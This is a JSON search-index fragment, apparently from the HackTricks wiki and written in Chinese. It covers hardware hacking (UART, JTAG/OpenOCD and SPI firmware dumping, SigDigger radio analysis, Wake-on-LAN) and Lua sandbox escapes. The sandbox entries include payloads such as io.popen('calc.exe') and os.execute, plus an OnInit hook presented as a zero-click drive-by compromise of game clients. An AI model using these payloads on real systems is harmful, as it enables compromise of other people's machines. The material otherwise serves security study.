UART » 基本信息","id":"10269","title":"基本信息"},"1027":{"body":"转储全局环境以清点可达的表/函数: lua -- Minimal _G dumper for any Lua sandbox with some output primitive `out`\\nlocal function dump_globals(out)\\nout(\\"=== DUMPING _G ===\\")\\nfor k, v in pairs(_G) do\\nout(tostring(k) .. \\" = \\" .. tostring(v))\\nend\\nend 如果没有 print() 可用,可改用 in-VM 通道。来自 MMO housing script VM 的示例:chat output 只有在 sound call 之后才会生效;以下构建了一个可靠的输出函数: lua -- Build an output channel using in-game primitives\\nlocal function ButlerOut(label)\\n-- Some engines require enabling an audio channel before speaking\\nH.PlaySound(0, \\"r[1]\\") -- quirk: required before H.Say()\\nreturn function(msg)\\nH.Say(label or 1, msg)\\nend\\nend function OnMenu(menuNum)\\nif menuNum ~= 3 then return end\\nlocal out = ButlerOut(1)\\ndump_globals(out)\\nend 将此模式泛化到你的目标:任何接受字符串的 textbox, toast, logger, or UI callback 都可以作为 stdout 用于侦察。","breadcrumbs":"Lua Sandbox Escape » 枚举沙箱环境","id":"1027","title":"枚举沙箱环境"},"10270":{"body":"UART有4个端口: TX (发送)、 RX (接收)、 Vcc (电压)和 GND (接地)。你可能会在PCB上找到带有**TX 和 RX 字母的4个端口。但如果没有指示,你可能需要使用 万用表 或 逻辑分析仪**自己寻找它们。 使用 万用表 并关闭设备电源: 要识别 GND 引脚,使用 连续性测试 模式,将黑色引线放入接地,使用红色引线测试,直到你听到万用表发出声音。PCB上可能会找到多个GND引脚,因此你可能找到或没有找到属于UART的引脚。 要识别 VCC端口 ,设置 直流电压模式 并将其设置为20 V电压。黑色探头接地,红色探头接引脚。打开设备电源。如果万用表测量到恒定电压为3.3 V或5 V,你就找到了Vcc引脚。如果得到其他电压,请尝试其他端口。 要识别 TX 端口 ,将 直流电压模式 设置为20 V电压,黑色探头接地,红色探头接引脚,打开设备电源。如果你发现电压波动几秒钟后稳定在Vcc值,你很可能找到了TX端口。这是因为在开机时,它会发送一些调试数据。 RX端口 是与其他3个端口最接近的,它的电压波动最低,所有UART引脚中整体值最低。 你可以混淆TX和RX端口,没什么问题,但如果混淆GND和VCC端口,你可能会烧毁电路。 在某些目标设备中,制造商通过禁用RX或TX甚至两者来禁用UART端口。在这种情况下,追踪电路板中的连接并找到一些断点可能会有所帮助。确认没有检测到UART和电路断开的一个强烈提示是检查设备保修。如果设备附带某些保修,制造商会留下某些调试接口(在这种情况下是UART),因此,必须断开UART并在调试时重新连接。这些断点引脚可以通过焊接或跳线连接。","breadcrumbs":"Hardware Hacking » UART » 识别UART端口","id":"10270","title":"识别UART端口"},"10271":{"body":"识别正确波特率的最简单方法是查看 TX引脚的输出并尝试读取数据 。如果接收到的数据不可读,请切换到下一个可能的波特率,直到数据变得可读。你可以使用USB转串行适配器或像Bus Pirate这样的多功能设备来做到这一点,并配合一个辅助脚本,如 baudrate.py 。最常见的波特率为9600、38400、19200、57600和115200。 caution 重要的是要注意,在此协议中,你需要将一个设备的TX连接到另一个设备的RX!","breadcrumbs":"Hardware Hacking » UART » 识别UART波特率","id":"10271","title":"识别UART波特率"},"10272":{"body":"CP210X芯片广泛用于许多原型板,如NodeMCU(带esp8266)进行串行通信。这些适配器相对便宜,可以用于连接目标的UART接口。该设备有5个引脚:5V、GND、RXD、TXD、3.3V。确保连接目标支持的电压,以避免任何损坏。最后,将适配器的RXD引脚连接到目标的TXD,将适配器的TXD引脚连接到目标的RXD。 如果适配器未被检测到,请确保主机系统中已安装CP210X驱动程序。一旦适配器被检测到并连接,可以使用picocom、minicom或screen等工具。 要列出连接到Linux/MacOS系统的设备: ls /dev/ 要与UART接口进行基本交互,请使用以下命令: picocom /dev/ --baud 对于minicom,请使用以下命令进行配置: minicom -s 在 Serial port setup 选项中配置波特率和设备名称等设置。 配置完成后,使用命令 minicom 启动以获取 UART 控制台。","breadcrumbs":"Hardware Hacking » UART » CP210X UART到TTY适配器","id":"10272","title":"CP210X UART到TTY适配器"},"10273":{"body":"如果没有可用的 UART 串行到 USB 适配器,可以使用 Arduino UNO R3 进行快速破解。由于 Arduino UNO R3 通常随处可用,这可以节省很多时间。 Arduino UNO R3 板上内置了 USB 到串行适配器。要获取 UART 连接,只需将 Atmel 328p 微控制器芯片从板上拔出。此破解适用于 Atmel 328p 未焊接在板上的 Arduino UNO R3 变体(使用的是 SMD 版本)。将 Arduino 的 RX 引脚(数字引脚 0)连接到 UART 接口的 TX 引脚,将 Arduino 的 TX 引脚(数字引脚 1)连接到 UART 接口的 RX 引脚。 最后,建议使用 Arduino IDE 获取串行控制台。在菜单的 tools 部分,选择 Serial Console 选项,并根据 UART 接口设置波特率。","breadcrumbs":"Hardware Hacking » UART » 通过 Arduino UNO R3 的 UART (可拆卸的 Atmel 328p 芯片板)","id":"10273","title":"通过 Arduino UNO R3 的 UART (可拆卸的 Atmel 328p 芯片板)"},"10274":{"body":"在这种情况下,我们将嗅探 Arduino 的 UART 通信,该通信将程序的所有打印信息发送到串行监视器。 bash # Check the modes\\nUART>m\\n1. HiZ\\n2. 1-WIRE\\n3. UART\\n4. I2C\\n5. SPI\\n6. 2WIRE\\n7. 3WIRE\\n8. KEYB\\n9. LCD\\n10. PIC\\n11. DIO\\nx. exit(without change) # Select UART\\n(1)>3\\nSet serial port speed: (bps)\\n1. 300\\n2. 1200\\n3. 2400\\n4. 4800\\n5. 9600\\n6. 19200\\n7. 38400\\n8. 57600\\n9. 115200\\n10. BRG raw value # Select the speed the communication is occurring on (you BF all this until you find readable things)\\n# Or you could later use the macro (4) to try to find the speed\\n(1)>5\\nData bits and parity:\\n1. 8, NONE *default\\n2. 8, EVEN\\n3. 8, ODD\\n4. 9, NONE # From now on pulse enter for default\\n(1)>\\nStop bits:\\n1. 1 *default\\n2. 2\\n(1)>\\nReceive polarity:\\n1. Idle 1 *default\\n2. Idle 0\\n(1)>\\nSelect output type:\\n1. Open drain (H=Hi-Z, L=GND)\\n2. Normal (H=3.3V, L=GND) (1)>\\nClutch disengaged!!!\\nTo finish setup, start up the power supplies with command \'W\'\\nReady # Start\\nUART>W\\nPOWER SUPPLIES ON\\nClutch engaged!!! # Use macro (2) to read the data of the bus (live monitor)\\nUART>(2)\\nRaw UART input\\nAny key to exit\\nEscritura inicial completada:\\nAAA Hi Dreg! AAA\\nwaiting a few secs to repeat....","breadcrumbs":"Hardware Hacking » UART » Bus Pirate","id":"10274","title":"Bus Pirate"},"10275":{"body":"UART 控制台提供了一种在运行时环境中处理底层固件的好方法。但是,当 UART 控制台访问为只读时,可能会引入许多限制。在许多嵌入式设备中,固件存储在 EEPROM 中,并在具有易失性内存的处理器中执行。因此,固件保持只读状态,因为制造时的原始固件就在 EEPROM 内部,任何新文件都可能因易失性内存而丢失。因此,在处理嵌入式固件时,转储固件是一项有价值的工作。 有很多方法可以做到这一点,SPI 部分涵盖了从 EEPROM 中直接提取固件的各种设备的方法。尽管如此,建议首先尝试通过 UART 转储固件,因为使用物理设备和外部交互转储固件可能存在风险。 从 UART 控制台转储固件需要首先获取对引导加载程序的访问权限。许多流行的供应商使用 uboot(通用引导加载程序)作为其引导加载程序来加载 Linux。因此,获取对 uboot 的访问权限是必要的。 要访问引导加载程序,请将 UART 端口连接到计算机,并使用任何串行控制台工具,并保持设备的电源断开。一旦设置完成,按下 Enter 键并保持不放。最后,连接设备的电源并让其启动。 这样做会中断 uboot 的加载并提供一个菜单。建议了解 uboot 命令并使用帮助菜单列出它们。这可能是 help 命令。由于不同的供应商使用不同的配置,因此有必要分别理解每个配置。 通常,转储固件的命令是: md 这代表“内存转储”。这将把内存(EEPROM 内容)转储到屏幕上。建议在开始程序之前记录串行控制台输出,以捕获内存转储。 最后,只需从日志文件中剥离所有不必要的数据,并将文件存储为 filename.rom,然后使用 binwalk 提取内容: binwalk -e 这将根据在十六进制文件中找到的签名列出 EEPROM 的可能内容。 尽管需要注意的是,即使正在使用 uboot,它并不总是解锁的。如果 Enter 键没有任何反应,请检查其他键,如空格键等。如果引导加载程序被锁定且没有被中断,则此方法将不起作用。要检查 uboot 是否是设备的引导加载程序,请在设备启动时检查 UART 控制台上的输出。它可能会在启动时提到 uboot。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » UART » 通过 UART 控制台转储固件","id":"10275","title":"通过 UART 控制台转储固件"},"10276":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » Radio » Radio","id":"10276","title":"Radio"},"10277":{"body":"SigDigger 是一个免费的数字信号分析仪,适用于GNU/Linux和macOS,旨在提取未知无线电信号的信息。它通过SoapySDR支持多种SDR设备,并允许可调的FSK、PSK和ASK信号解调,解码模拟视频,分析突发信号并实时收听模拟语音通道。","breadcrumbs":"Hardware Hacking » Radio » SigDigger","id":"10277","title":"SigDigger"},"10278":{"body":"安装后,有一些配置选项可以考虑。 在设置(第二个标签按钮)中,您可以选择 SDR设备 或 选择一个文件 进行读取,以及要调谐的频率和采样率(如果您的PC支持,建议最高可达2.56Msps)。 在GUI行为中,如果您的PC支持,建议启用一些选项: note 如果您发现您的PC没有捕获到信号,请尝试禁用OpenGL并降低采样率。","breadcrumbs":"Hardware Hacking » Radio » Basic Config","id":"10278","title":"Basic Config"},"10279":{"body":"只需 捕获信号的一段时间并分析它 ,只需按住“Push to capture”按钮,保持所需时间。 SigDigger的 调谐器 有助于 捕获更好的信号 (但也可能会降低信号质量)。理想情况下,从0开始,继续 增大 ,直到您发现引入的 噪声 大于您所需的 信号改善 。","breadcrumbs":"Hardware Hacking » Radio » Uses","id":"10279","title":"Uses"},"1028":{"body":"如果沙箱仍然暴露标准库 io or os,你很可能可以立即执行命令: lua -- Windows example\\nio.popen(\\"calc.exe\\") -- Cross-platform variants depending on exposure\\nos.execute(\\"/usr/bin/id\\")\\nio.popen(\\"/bin/sh -c \'id\'\\") 执行发生在 client process 内;许多阻止 external debuggers 的 anti-cheat/antidebug 层并不会阻止 in-VM process creation。 还要检查:package.loadlib (arbitrary DLL/.so loading)、require with native modules、LuaJIT\'s ffi (if present)、以及 debug library(可以在 VM 内提升权限)。","breadcrumbs":"Lua Sandbox Escape » 如果暴露了 io/os,可以直接执行命令","id":"1028","title":"如果暴露了 io/os,可以直接执行命令"},"10280":{"body":"使用 SigDigger 与您想要收听的频道同步,配置“基带音频预览”选项,配置带宽以获取所有发送的信息,然后将调谐器设置到噪声真正开始增加之前的水平:","breadcrumbs":"Hardware Hacking » Radio » Synchronize with radio channel","id":"10280","title":"Synchronize with radio channel"},"10281":{"body":"当设备发送信息突发时,通常 第一部分是前导码 ,因此您 不必担心 如果您 没有找到信息 或 那里有一些错误 。 在信息帧中,您通常应该 找到不同的帧彼此对齐 : 在恢复比特后,您可能需要以某种方式处理它们 。例如,在曼彻斯特编码中,上+下将是1或0,下+上将是另一个。因此,1和0的对(上和下)将是真实的1或真实的0。 即使信号使用曼彻斯特编码(不可能找到连续超过两个的0或1),您也可能在前导码中 找到多个1或0 !","breadcrumbs":"Hardware Hacking » Radio » Interesting tricks","id":"10281","title":"Interesting tricks"},"10282":{"body":"有3种方式在信号中存储信息:调制 幅度 、 频率 或 相位 。 如果您正在检查信号,有不同的方法可以尝试找出用于存储信息的方式(更多方法见下文),但一个好的方法是检查IQ图。 检测AM :如果在IQ图中出现例如 2个圆圈 (可能一个在0,另一个在不同的幅度),这可能意味着这是一个AM信号。这是因为在IQ图中,0和圆圈之间的距离是信号的幅度,因此很容易可视化使用的不同幅度。 检测PM :如前图所示,如果您发现小圆圈彼此无关,这可能意味着使用了相位调制。这是因为在IQ图中,点与0,0之间的角度是信号的相位,这意味着使用了4种不同的相位。 请注意,如果信息隐藏在相位变化的事实中,而不是相位本身,您将不会看到不同的相位清晰区分。 检测FM :IQ没有识别频率的字段(到中心的距离是幅度,角度是相位)。 因此,要识别FM,您应该 在此图中基本上只看到一个圆 。 此外,不同的频率通过IQ图的 速度加速穿过圆 来“表示”(因此在SysDigger中选择信号时,IQ图被填充,如果您发现创建的圆中的加速或方向变化,这可能意味着这是FM):","breadcrumbs":"Hardware Hacking » Radio » Uncovering modulation type with IQ","id":"10282","title":"Uncovering modulation type with IQ"},"10283":{"body":"","breadcrumbs":"Hardware Hacking » Radio » AM Example","id":"10283","title":"AM Example"},"10284":{"body":"Checking the envelope 使用 SigDigger 检查AM信息,仅查看 包络 ,您可以看到不同的清晰幅度水平。所用信号以AM发送信息脉冲,这就是一个脉冲的样子: 这就是符号的一部分与波形的样子: Checking the Histogram 您可以 选择包含信息的整个信号 ,选择 幅度 模式和 选择 ,然后单击 直方图 。您可以观察到仅找到2个清晰的水平。 例如,如果您在此AM信号中选择频率而不是幅度,您只会找到1个频率(没有信息调制在频率上仅使用1个频率)。 如果您发现很多频率,这可能不会是FM,可能信号频率只是因为频道而被修改。 With IQ 在此示例中,您可以看到有一个 大圆 ,但也有 很多点在中心 。","breadcrumbs":"Hardware Hacking » Radio » Uncovering AM","id":"10284","title":"Uncovering AM"},"10285":{"body":"With one symbol 选择您能找到的最小符号(以确保它只是1个),并检查“选择频率”。在这种情况下,它将是1.013kHz(即1kHz)。 With a group of symbols 您还可以指示要选择的符号数量,SigDigger将计算1个符号的频率(选择的符号越多,可能越好)。在这种情况下,我选择了10个符号,“选择频率”为1.004 Khz:","breadcrumbs":"Hardware Hacking » Radio » Get Symbol Rate","id":"10285","title":"Get Symbol Rate"},"10286":{"body":"发现这是一个 AM调制 信号和 符号率 (并且知道在这种情况下某个上意味着1,某个下意味着0),很容易 获取信号中编码的比特 。因此,选择包含信息的信号并配置采样和决策,然后按下采样(检查 幅度 已选择,发现的 符号率 已配置, Gadner时钟恢复 已选择): 同步到选择间隔 意味着如果您之前选择了间隔以找到符号率,则将使用该符号率。 手动 意味着将使用指示的符号率。 在 固定间隔选择 中,您指示应选择的间隔数量,并从中计算符号率。 Gadner时钟恢复 通常是最佳选项,但您仍需指示一些近似的符号率。 按下采样后,出现以下内容: 现在,为了让SigDigger理解 信息承载的水平范围 ,您需要单击 较低水平 并保持按住,直到达到最高水平: 如果例如有 4个不同的幅度水平 ,您应该将 每个符号的比特数配置为2 ,并从最小值选择到最大值。 最后 增加****缩放 和 更改行大小 ,您可以看到比特(您可以选择所有并复制以获取所有比特): 如果信号每个符号有超过1个比特(例如2),SigDigger 无法知道哪个符号是 00、01、10、11,因此它将使用不同的 灰度 来表示每个(如果您复制比特,它将使用 0到3的数字 ,您需要处理它们)。 此外,使用 编码 如 曼彻斯特 , 上+下 可以是 1或0 ,而下+上可以是1或0。在这些情况下,您需要**处理获得的上(1)和下(0)**以替换成对的01或10为0或1。","breadcrumbs":"Hardware Hacking » Radio » Get Bits","id":"10286","title":"Get Bits"},"10287":{"body":"","breadcrumbs":"Hardware Hacking » Radio » FM Example","id":"10287","title":"FM Example"},"10288":{"body":"Checking the frequencies and waveform 发送信息调制为FM的信号示例: 在前面的图像中,您可以很好地观察到 使用了2个频率 ,但如果您 观察 波形,您可能 无法正确识别这2个不同的频率 : 这是因为我在两个频率上捕获了信号,因此一个大约是另一个的负值: 如果同步频率 更接近一个频率而不是另一个 ,您可以轻松看到这2个不同的频率: Checking the histogram 检查带有信息的信号的频率直方图,您可以轻松看到2个不同的信号: 在这种情况下,如果您检查 幅度直方图 ,您将发现 只有一个幅度 ,因此 不能是AM (如果您发现很多幅度,可能是因为信号在频道中失去了功率): 这将是相位直方图(这清楚表明信号不是相位调制): With IQ IQ没有识别频率的字段(到中心的距离是幅度,角度是相位)。 因此,要识别FM,您应该 在此图中基本上只看到一个圆 。 此外,不同的频率通过IQ图的 速度加速穿过圆 来“表示”(因此在SysDigger中选择信号时,IQ图被填充,如果您发现创建的圆中的加速或方向变化,这可能意味着这是FM):","breadcrumbs":"Hardware Hacking » Radio » Uncovering FM","id":"10288","title":"Uncovering FM"},"10289":{"body":"您可以使用 与AM示例中使用的相同技术 来获取符号率,一旦您找到了承载符号的频率。","breadcrumbs":"Hardware Hacking » Radio » Get Symbol Rate","id":"10289","title":"Get Symbol Rate"},"1029":{"body":"如果 host application 将脚本推送到 clients 且 VM 暴露 auto-run hooks(例如 OnInit/OnLoad/OnEnter),则在脚本加载时立即将你的 payload 放到那里,以实现 drive-by compromise: lua function OnInit()\\nio.popen(\\"calc.exe\\") -- or any command\\nend 任何等效的回调(OnLoad、OnEnter 等)在脚本被传输并自动在客户端执行时会将此技术泛化。","breadcrumbs":"Lua Sandbox Escape » 通过 auto-run callbacks 的 Zero-click 触发器","id":"1029","title":"通过 auto-run callbacks 的 Zero-click 触发器"},"10290":{"body":"您可以使用 与AM示例中使用的相同技术 来获取比特,一旦您 发现信号是频率调制的 和 符号率 。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » Radio » Get Bits","id":"10290","title":"Get Bits"},"10291":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 HackTricks","breadcrumbs":"Hardware Hacking » JTAG » JTAG","id":"10291","title":"JTAG"},"10292":{"body":"JTAGenum 是一个可以加载到兼容Arduino的MCU或(实验性地)Raspberry Pi上的工具,用于暴力破解未知的JTAG引脚排列,甚至枚举指令寄存器。 Arduino:将数字引脚D2–D11连接到最多10个可疑的JTAG垫/测试点,并将Arduino GND连接到目标GND。除非你知道电源轨是安全的,否则单独为目标供电。优先使用3.3 V逻辑(例如,Arduino Due),或在探测1.8–3.3 V目标时使用电平转换器/串联电阻。 Raspberry Pi:Pi构建暴露的可用GPIO较少(因此扫描速度较慢);请查看repo以获取当前引脚图和限制。 一旦刷写完成,打开115200波特率的串口监视器并发送h以获取帮助。典型流程: l 查找环回以避免误报 r 如有需要,切换内部上拉电阻 s 扫描TCK/TMS/TDI/TDO(有时还包括TRST/SRST) y 暴力破解IR以发现未记录的操作码 x 引脚状态的边界扫描快照 如果找到有效的TAP,你将看到以FOUND!开头的行,表示发现的引脚。 提示 始终共享接地,切勿将未知引脚驱动到高于目标Vtref。如果有疑问,请在候选引脚上添加100–470 Ω的串联电阻。 如果设备使用SWD/SWJ而不是4线JTAG,JTAGenum可能无法检测到;尝试SWD工具或支持SWJ‑DP的适配器。","breadcrumbs":"Hardware Hacking » JTAG » JTAGenum","id":"10292","title":"JTAGenum"},"10293":{"body":"首先使用万用表识别Vtref和GND。许多适配器需要Vtref来设置I/O电压。 电平转换:优先使用为推挽信号设计的双向电平转换器(JTAG线路不是开漏)。避免为JTAG使用自动方向的I2C转换器。 有用的适配器:FT2232H/FT232H板(例如,Tigard)、CMSIS‑DAP、J‑Link、ST‑LINK(特定于供应商)、ESP‑USB‑JTAG(在ESP32‑Sx上)。至少连接TCK、TMS、TDI、TDO、GND和Vtref;可选连接TRST和SRST。","breadcrumbs":"Hardware Hacking » JTAG » 更安全的引脚探测和硬件设置","id":"10293","title":"更安全的引脚探测和硬件设置"},"10294":{"body":"OpenOCD是JTAG/SWD的事实上的开源软件。使用支持的适配器,你可以扫描链并读取IDCODE: 使用J‑Link的通用示例: openocd -f interface/jlink.cfg -c \\"transport select jtag; adapter speed 1000\\" \\\\\\n-c \\"init; scan_chain; shutdown\\" ESP32‑S3 内置 USB‑JTAG(无需外部探头): openocd -f board/esp32s3-builtin.cfg -c \\"init; scan_chain; shutdown\\" 笔记 如果您得到“全1/全0” IDCODE,请检查接线、电源、Vtref,以及端口是否被保险丝/选项字节锁定。 请参阅 OpenOCD 低级 irscan/drscan 以在启动未知链时手动进行 TAP 交互。","breadcrumbs":"Hardware Hacking » JTAG » 与OpenOCD的首次接触(扫描和IDCODE)","id":"10294","title":"与OpenOCD的首次接触(扫描和IDCODE)"},"10295":{"body":"一旦识别了 TAP 并选择了目标脚本,您可以停止核心并转储内存区域或内部闪存。示例(调整目标、基地址和大小): 初始化后的通用目标: openocd -f interface/jlink.cfg -f target/stm32f1x.cfg \\\\\\n-c \\"init; reset halt; mdw 0x08000000 4; dump_image flash.bin 0x08000000 0x00100000; shutdown\\" RISC‑V SoC(在可用时优先选择SBA): openocd -f interface/ftdi/ft232h.cfg -f target/riscv.cfg \\\\\\n-c \\"init; riscv set_prefer_sba on; halt; dump_image sram.bin 0x80000000 0x20000; shutdown\\" ESP32‑S3,通过 OpenOCD 辅助程序进行编程或读取: openocd -f board/esp32s3-builtin.cfg \\\\\\n-c \\"program_esp app.bin 0x10000 verify exit\\" Tips 使用 mdw/mdh/mdb 在长时间转储之前检查内存的完整性。 对于多设备链,在非目标设备上设置 BYPASS 或使用定义所有 TAP 的板文件。","breadcrumbs":"Hardware Hacking » JTAG » 停止 CPU 并转储内存/闪存","id":"10295","title":"停止 CPU 并转储内存/闪存"},"10296":{"body":"即使 CPU 调试访问被锁定,边界扫描仍可能被暴露。使用 UrJTAG/OpenOCD 你可以: SAMPLE 在系统运行时快照引脚状态(查找总线活动,确认引脚映射)。 EXTEST 驱动引脚(例如,通过 MCU 位翻转外部 SPI 闪存线路,如果板子接线允许的话,可以离线读取)。 使用 FT2232x 适配器的最小 UrJTAG 流程: jtag> cable ft2232 vid=0x0403 pid=0x6010 interface=1\\njtag> frequency 100000\\njtag> detect\\njtag> bsdl path /path/to/bsdl/files\\njtag> instruction EXTEST\\njtag> shift ir\\njtag> dr 您需要设备 BSDL 以了解边界寄存器位的顺序。请注意,一些供应商在生产中锁定边界扫描单元。","breadcrumbs":"Hardware Hacking » JTAG » 边界扫描技巧 (EXTEST/SAMPLE)","id":"10296","title":"边界扫描技巧 (EXTEST/SAMPLE)"},"10297":{"body":"ESP32‑S3/C3 包含原生 USB‑JTAG 桥接器;OpenOCD 可以直接通过 USB 进行通信,无需外部探头。这对于初步检查和转储非常方便。 RISC‑V 调试 (v0.13+) 得到了 OpenOCD 的广泛支持;当核心无法安全停止时,优先使用 SBA 进行内存访问。 许多 MCU 实现了调试认证和生命周期状态。如果 JTAG 看起来无响应但电源正常,设备可能被熔断到封闭状态或需要经过认证的探头。","breadcrumbs":"Hardware Hacking » JTAG » 现代目标和注意事项","id":"10297","title":"现代目标和注意事项"},"10298":{"body":"在生产中永久禁用或锁定 JTAG/SWD(例如,STM32 RDP 级别 2,ESP eFuses 禁用 PAD JTAG,NXP/Nordic APPROTECT/DPAP)。 在保持制造访问的同时,要求经过认证的调试(ARMv8.2‑A ADIv6 调试认证,OEM 管理的挑战-响应)。 不要布线简单的测试垫;埋藏测试通孔,移除/填充电阻以隔离 TAP,使用带键控或弹簧针夹具的连接器。 上电调试锁:在早期 ROM 后面对 TAP 进行门控,以强制执行安全启动。","breadcrumbs":"Hardware Hacking » JTAG » 防御和加固(在真实设备上预期的内容)","id":"10298","title":"防御和加固(在真实设备上预期的内容)"},"10299":{"body":"OpenOCD 用户指南 – JTAG 命令和配置。 https://openocd.org/doc-release/html/JTAG-Commands.html Espressif ESP32‑S3 JTAG 调试(USB‑JTAG,OpenOCD 使用)。 https://docs.espressif.com/projects/esp-idf/en/latest/esp32s3/api-guides/jtag-debugging/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » JTAG » 参考文献","id":"10299","title":"参考文献"},"103":{"body":"Wake On Lan 用于通过 网络消息 来 启动 计算机。用于启动计算机的 magic packet 只是一个包含 MAC Dst 的数据包,然后它在同一数据包内被 重复 16 次 。 这类数据包通常通过 ethernet 0x0842 或 UDP packet to port 9 发送。 如果未提供 [MAC] ,数据包将发送到 broadcast ethernet (广播 MAC 将是被重复的那个)。 bash # Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)\\nwol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0842\\nwol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9","breadcrumbs":"Pentesting Network » Wake On Lan","id":"103","title":"Wake On Lan"},"1030":{"body":"在 _G 枚举期间,特别注意查找: io, os: io.popen, os.execute, file I/O, env access. load, loadstring, loadfile, dofile: 执行源代码或 bytecode;支持加载不受信任的 bytecode。 package, package.loadlib, require: 动态库加载和模块接口。 debug: setfenv/getfenv (≤5.1), getupvalue/setupvalue, getinfo, and hooks. LuaJIT-only: ffi.cdef, ffi.load to call native code directly. Minimal usage examples (if reachable): lua -- Execute source/bytecode\\nlocal f = load(\\"return 1+1\\")\\nprint(f()) -- 2 -- loadstring is alias of load for strings in 5.1\\nlocal bc = string.dump(function() return 0x1337 end)\\nlocal g = loadstring(bc) -- in 5.1 may run precompiled bytecode\\nprint(g()) -- Load native library symbol (if allowed)\\nlocal mylib = package.loadlib(\\"./libfoo.so\\", \\"luaopen_foo\\")\\nlocal foo = mylib()","breadcrumbs":"Lua Sandbox Escape » 在侦察期间要搜索的危险原语","id":"1030","title":"在侦察期间要搜索的危险原语"},"10300":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » SPI » SPI","id":"10300","title":"SPI"},"10301":{"body":"SPI(串行外设接口)是一种用于嵌入式系统的同步串行通信协议,用于IC(集成电路)之间的短距离通信。SPI通信协议利用主从架构,由时钟和芯片选择信号进行协调。主从架构由一个主设备(通常是微处理器)管理外部外设,如EEPROM、传感器、控制设备等,这些外设被视为从设备。 多个从设备可以连接到一个主设备,但从设备之间不能相互通信。从设备由两个引脚管理,时钟和芯片选择。由于SPI是一种同步通信协议,输入和输出引脚遵循时钟信号。芯片选择由主设备用于选择一个从设备并与之交互。当芯片选择为高时,从设备未被选择,而当其为低时,芯片已被选择,主设备将与从设备进行交互。 MOSI(主输出,从输入)和MISO(主输入,从输出)负责数据发送和接收。数据通过MOSI引脚发送到从设备,同时芯片选择保持为低。输入数据包含指令、内存地址或根据从设备供应商的数据表的数据。在有效输入后,MISO引脚负责将数据传输到主设备。输出数据在输入结束后的下一个时钟周期准确发送。MISO引脚在数据完全传输完毕之前会继续传输数据,或者主设备将芯片选择引脚设为高(在这种情况下,从设备将停止传输,主设备在下一个时钟周期后将不再接收)。","breadcrumbs":"Hardware Hacking » SPI » 基本信息","id":"10301","title":"基本信息"},"10302":{"body":"转储固件对于分析固件和发现其中的漏洞非常有用。很多时候,固件在互联网上不可用或由于型号、版本等因素的变化而无关紧要。因此,直接从物理设备提取固件在寻找威胁时可以非常有帮助。 获取串行控制台可能会很有帮助,但很多时候文件是只读的。这由于各种原因限制了分析。例如,发送和接收数据包所需的工具可能不在固件中。因此,提取二进制文件进行逆向工程是不可行的。因此,将整个固件转储到系统中并提取二进制文件进行分析可能非常有帮助。 此外,在红队活动和获取设备的物理访问权限时,转储固件可以帮助修改文件或注入恶意文件,然后将其重新闪存到内存中,这可能有助于在设备中植入后门。因此,通过固件转储可以解锁许多可能性。","breadcrumbs":"Hardware Hacking » SPI » 从EEPROM中转储固件","id":"10302","title":"从EEPROM中转储固件"},"10303":{"body":"该设备是一个廉价的工具,用于从EEPROM中转储固件,并使用固件文件重新闪存。这是处理计算机BIOS芯片(实际上就是EEPROM)的热门选择。该设备通过USB连接,并需要最少的工具即可开始使用。此外,它通常能快速完成任务,因此在物理设备访问中也很有帮助。 drawing 